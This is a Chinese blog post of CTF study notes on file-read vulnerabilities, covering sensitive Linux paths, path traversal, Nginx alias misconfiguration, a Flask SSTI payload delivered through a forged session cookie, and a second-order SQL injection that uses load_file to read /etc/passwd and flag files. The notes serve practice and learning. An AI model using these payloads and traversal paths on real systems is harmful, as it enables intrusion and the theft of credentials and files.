文件读取

最新推荐文章于 2024-05-11 03:25:30 发布
最新推荐文章于 2024-05-11 03:25:30 发布
阅读量242 收藏
点赞数
分类专栏: web安全复习周 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/114829646
版权

文章目录

文件读取漏洞常见读取路径

Linux

  • flag名称(相对路径)
  1. …/…/…/…/…/…/flag(.txt|.php|.pyc|.py)
  2. flag(.txt|.php|.pyc|.py)
    等等
  • 服务器信息(绝对路径)
  1. /etc:/etc目录下是各种应用或系统配置文件
  2. /etc/passwd:是Linux系统保存用户信息及其工作目录的文件,权限是所有用户/组可读,可以认为是Linux系统下文件读取漏洞存在性判断的基准
  3. /etc/shadow:是Linux系统保存用户信息并且可能存在密码(hash)文件,权限是root用户可以读取、shadow组可读
  4. /etc/apache2/:是apache配置文件,可以获知web目录,服务端口等信息
    等等 具体自行查阅

windows

  • windos系统下的web应用任意文件读取在搭配PHP文件时候,可以使用"<"等符号作为通配符号,在不知道完整文件名称的情况下进行文件读取

例题

[第一章 web入门]afr_1

  • dirsearch扫描发现flag.php
    在这里插入图片描述
  • 访问后页面没有回显
  • php://filter/read=convert.base64-encode/resource=flag
  • 解码获取flag

[第一章 web入门]afr_2

  • 访问页面一开始没有思路
  • F12查看页面源代码
<html>
<head><title>Index of /img/</title></head>
<body bgcolor="white">
<h1>Index of /img/</h1><hr><pre><a href="../">../</a>
<a href="img.gif">img.gif</a>          
</pre><hr></body>
</html>
  • 发现img.gif相对路径
  • 访问:http://adf5da39-0843-47a6-8229-35fafd734d5c.node3.buuoj.cn/img/
    在这里插入图片描述
  • 进行目录穿越:http://adf5da39-0843-47a6-8229-35fafd734d5c.node3.buuoj.cn/img…/
    在这里插入图片描述
  • 发现flag文件 over!!

原理

  • Nginx错误配置

Nginx错误配置导致文件读取漏洞,Nginx一般被视为Python-Web反向代理的最佳实现.
配置文件错误容易导致严重的问题

  • 例如
location /static{
         alias /home/myapp/static/;
  • 此时如果用户请求的web路径是/static…/拼接后就变为/home/myapp/static/…/
  • 就会造成文件穿越漏洞
  • 漏洞成因是location最后没有加"/"限制,Nginx匹配到路基static后,将其后面的内容拼接到alias

[第一章 web入门]afr_3

  • 访问到Article Content页面,存在任意文件读取
  • /article?name=../../../../etc/passwd
    在这里插入图片描述
  • 尝试读取flag
  • /article?name=../../../../flag
  • 页面返回 no permission! flag文件被禁止访问了
  • 这里学习一个新的知识

Linux下的/proc目录

  • /proc 目录通常存储着进程动态运行的各种信息,本质上是一种虚拟目录
  • 如果要查看当前进程的信息,pid是可以进行暴力破解的,如果要查看当前进程,只需/proc/self代替/proc/[pid]即可
  • /proc/[pid]/cmdline:cmdline可以读出比较敏感的信息 [pid]指向进程所对应的终端命令
  • /proc/[pid]/cwd/:无法获取当前应用所在目录,可以通过cwd命令直接跳转到当前目录 [pid]指向进程的运行目录
  • /proc/[pid]/environ:读取环境变量 [pid]指向经常运行时环境变量
  • 继续解题
  • /article?name=../../../../../proc/self/cmdline
    在这里插入图片描述
  • 发现pythonserver.py文件
  • /article?name=../../../../../proc/self/cwd/server.py
  • 通过cwd命令获取当前应用所在的目录 这样就读取
#!/usr/bin/python
import os
from flask import (Flask, render_template, request, url_for, redirect, session, render_template_string)
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')#execfile() 函数可以用来执行一个文件。
execfile('key.py')
FLAG = flag
app.secret_key = key 
@ app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index")) # redirect() url重定向
    n1code = request.form.get("n1code") or None
    if n1code is not None: n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code
template = None
if session[
    'n1code'] is not None: template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %
session['n1code']
session['n1code'] = None
return render_template_string(template) @ app.route("/", methods=["GET"])


def index(): return render_template("main.html") @ app.route('/article', methods=['GET'])


def article(): error = 0


if 'name' in request.args:
    page = request.args.get('name') else:
    page = 'article'
if page.find('flag') >= 0: page = 'notallowed.txt'
try:
    template = open('/home/nu11111111l/articles/{}'.format(page)).read() except Exception as e:
    template = e
return render_template('article.html', template=template)
if __name__ == "__main__": 
app.run(host='0.0.0.0', debug=False)
  • 发现key.py和flag.py文件
  • /article?name=../../../../../../../../proc/self/cwd/key.py
  • 成功读取key.py文件key = 'Drmhze6EPcv0fN_81Bj-nA'
  • flag文件 无法读取
  • 审计一下代码 发现了一个SSTI注入点
FLAG = flag
app.secret_key = key 
@ app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index")) # redirect ()url重定向
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
    if "n1code" not in session or session['n1code'] is None: 
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None: 
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %session['n1code']
        session['n1code'] = None
    return render_template_string(template)
  • flask从session中获取数据可以利用session伪造去获取Flag
  • 所以这里利用session伪造进行SSTI注入获取Flag
  • SSTI
{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}
  • 加上前面得到的密钥进行cookie伪造
  • 密钥: Drmhze6EPcv0fN_81Bj-nA
./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
  • 利用flask_session_cookie_manager3加密
    在这里插入图片描述
  • 修改cookie获取flag

文章内容素材取自于《从0到1CTFer成长之路》

比赛实例

[网鼎杯 2018]Comment

  • 发帖之前需要登录账号
    在这里插入图片描述
  • 给了账号密码的前半部分 burpsuit爆破一下密码
  • 爆破出密码是zhangwei666 直接登录
  • 习惯性的dirsearch扫描一下网站
    在这里插入图片描述
  • 发现git泄露 GitHack下载源码
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
   header("Location: ./login.php");
   die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
   $category = addslashes($_POST['category']);
   $title = addslashes($_POST['title']);
   $content = addslashes($_POST['content']);
   $sql = "insert into board
           set category = '$category',
               title = '$title',
               content = '$content'";
   $result = mysql_query($sql);
   header("Location: ./index.php");
   break;
case 'comment':
   $bo_id = addslashes($_POST['bo_id']);
   $sql = "select category from board where id='$bo_id'";
   $result = mysql_query($sql);
   $num = mysql_num_rows($result);
   if($num>0){
   $category = mysql_fetch_array($result)['category'];
   $content = addslashes($_POST['content']);
   $sql = "insert into comment
           set category = '$category',
               content = '$content',
               bo_id = '$bo_id'";
   $result = mysql_query($sql);
   }
   header("Location: ./comment.php?id=$bo_id");
   break;
default:
   header("Location: ./index.php");
}
}
else{
   header("Location: ./index.php");
}
?>
  • 这个题目的关键点在于write中的category填写的注入语句和comment中填写的content内容
  • comment直接将category的数据取出,没有经过任何的过滤操作
  • 而我们在写入的时候经过了addslashes($_POST['category'])处理,所以我们可以在这里花点心思
  • 而这道题目的最坑点在于
$content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
  • 因为是分行插入,所以在注入后面添加#是没有用,要用到/**/
  • 举个例子:

我们在发帖的时候
TITLE:database
CATEGORY:123’,content=database(),/*
CONTENT:123
在提交留言处写入
*/#

  • 这个时候代码就变为
$content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '123',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

insert into comment
            set category = '123',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";
  • 返回的页面就是
    在这里插入图片描述
  • 接着我又尝试了123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
  • 返回的是board,comment,user
  • 我把各个表查烂了 没有找到flag …
  • 于是又开始查看文件
  • 123',content=(select (load_file('/etc/passwd'))),/*
insert into comment
            set category = '123',content=(select (load_file('/etc/passwd'))),/*',
                content = '*/#',
                bo_id = '$bo_id'";
  • 返回的值在这里插入图片描述
  • 123',content=(select (load_file('/home/www/.bash_history'))),/*
  • 123', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
  • 解码后flag_8946e1ff1ee3e40f.php在这里插入图片描述
  • 123',content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
  • flag在F12里面!!!!
    在这里插入图片描述
  • 手动注入的一下午!!!
海上清辉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
读取文件
Joe的博客
01-13 331
问题: train_df = pd.read_csv("input/train.csv") 首先,报错 OSError: Initializing from file failed 常用的解决方案: 1.把当前路径中的中文改成英文。 2.cd到你的csv文件目录下,然后直接打开csv文件。 but,问题怎么会如此简单,路径名都是英文啊(专业素养),文件目录肯定调试过了,但是问题依旧。 try...
文件读写I/O流
XChang_E_的博客
07-01 1906
在这一块需要注意要写入的文件不能是.txt类型,否则打开会出现乱码,这是因为写入文件乱码的问题可能是由于文件的扩展名不正确引起的。Writer类用于写入字符流,它的常用子类包括FileWriter(用于向文件写入字符数据),OutputStreamWriter(用于向输出流写入字符数据)等。Reader类用于读取字符流,它的常用子类包括FileReader(用于从文件读取字符数据),InputStreamReader(用于从输入流读取字符数据)等。是一个用于将字符输出流转换为字节输出流的桥梁。
Java读取文件的几种方式
C3Stones
03-02 1万+
1. 使用流读取文件 public static void stream() { String fileName = "D:\\test.txt"; final String CHARSET_NAME = "UTF-8"; List<String> content = new ArrayList<>(); try (BufferedRe...
java从文件读取数据的几种方法(Java io基础)
最新发布
2401_84815227的博客
05-11 763
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数Java工程师,想要提升技能,往往是自己摸索成长,自己不成体系的自学效果低效漫长且无助。因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
使用三种方式读取文本文件
小吉妙妙屋
03-17 1744
在技术的道路上,我们不断探索、不断前行,不断面对挑战、不断突破自我。总的来说,这三种方式都是通过逐个字符、字符数组或者整行文本来进行读写操作,其中第三种方式使用了缓冲字符流,可以进一步提高效率。不过这次使用一个字符数组作为缓冲区,通过循环读取一定长度的字符数组,然后将整个数组写入目标文件。这种方式更高效,因为它可以一次性读取和写入整行文本,减少了IO操作的次数。这种方式虽然简单,但由于是逐个字符读写,可能会比较慢,特别是对于大文件。使用一个循环来逐个读取文件中的字符,然后逐个将其写入目标文件
C++文件读取的四种情况
weixin_62210536的博客
10-11 1万+
C++文件读取的四种情况
python文件读取
热门推荐
qq_45011164的博客
10-29 5万+
1.文件读取 1.read() 读取整个文件 2.readline() 每次读取一行文件 3. readlines() 读取文件的所有行 2.文件的写入 1.以"x"方式打开文件 2.以"a"方式打开文件 3.以"w"方式打开文件 3.文件的删除 4.Excel表数据的读取 1.直接读取 2.通过pd.ExcelFile()读取 3.通过pd.read_excel()读取 pd.read_excel()方法的常用参数 5.Excel表数据的写入
Binary Viewer二进制文件读取软件
07-10
**二进制文件读取与Binary Viewer** 在计算机科学领域,二进制文件是指由机器可以直接理解和执行的数据格式,它们不包含任何人类可读的文本信息。这些文件通常包括音频、视频、图像、程序和系统文件等。由于二进制...
C语言 FILE 文件读写
03-13
接着,代码展示了文件读取操作,再次使用fopen()函数以读取模式打开文件,并使用fgets()逐行读取文件内容,最后通过循环打印出文件内容。 需要注意的是,如果在运行代码之前不存在 "example.txt" 文件,该文件会被...
文件读写内存映射.rar
05-18
本主题聚焦于Qt框架下如何利用内存映射进行大文件的读写操作。Qt是一个跨平台的C++库,提供了丰富的功能,包括图形用户界面、网络编程、数据库访问等,同时也支持内存映射技术。 内存映射允许将大文件的部分或全部...
易语言大文件读写模块
07-18
通常,初始化可能涉及打开文件、检查文件是否存在、设置读写模式(读取或写入)等步骤。 “取总行数”功能允许开发者获取文件中的总行数,这对于数据统计或分析非常有用。实现这一功能通常需要遍历文件,但为了避免...
Android 文件读写操作方法总结
08-31
Android 文件读写操作方法总结 Android 中的文件读写操作是 Android 应用程序开发中不可或缺的一部分。... Android 文件读写操作需要根据不同的文件类型和存储位置选择合适的读写方式,以确保文件的正确读取和写入。
怎么读文件
qq_50977605的博客
09-05 3533
文件的简单方法
python-文件读取操作
likinguuu的博客
06-15 1743
python-文件读取操作,读取整个文件内容,文件整行读取,按字数读取、使用with自动关闭文件
C++文件读取的四种方式
m0_74756975的博客
04-06 2万+
第四种方法:利用ifs内部的get()函数一个个的将字符读出来,遇到EOF时返回False退出while循环,EOF 是 end of file的标志,不太建议使用这个,因为这个很慢,只能一个一个字符读取。局限性:由于“
Python 读取文件四种姿势:实例详解,从此读取文件更得心应手
陈书予
03-02 2万+
Python 文件读取的4种方式 超级详细讲解 和代码示例
文件读取与操作
z202331720425的博客
03-27 790
我们程序的数据需要输出到各种外部设备,也需要从外部设备获取数据,不同的外部设备的输⼊输出 操作各不相同,为了⽅便程序员对各种设备进⾏⽅便的操作,我们抽象出了流的概念,我们可以把流 想象成流淌着字符的河。在编写程序的时候,在打开⽂件的同时,都会返回⼀个FILE*的指针变量指向该⽂件,也相当于建⽴了 指针和⽂件的关系。⽂件的内容不⼀定是程序,⽽是程序运⾏时读写的数据,⽐如程序运⾏需要从中读取数据的⽂件,或 者输出内容的⽂件。数据在内存中以⼆进制的形式存储,如果不加转换的输出到外存的⽂件中,就是⼆进制⽂件。
C语言的文件读取------C语言
makabaka12138的博客
10-01 1万+
C语言的文件读取------C语言
文件读写命令
06-01
# 文件读取 with open('example.txt', 'r') as f: content = f.read() print(content) # 文件写入 with open('example.txt', 'w') as f: f.write('Hello, world!') ``` 2. 在Linux或MacOS终端使用cat命令进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值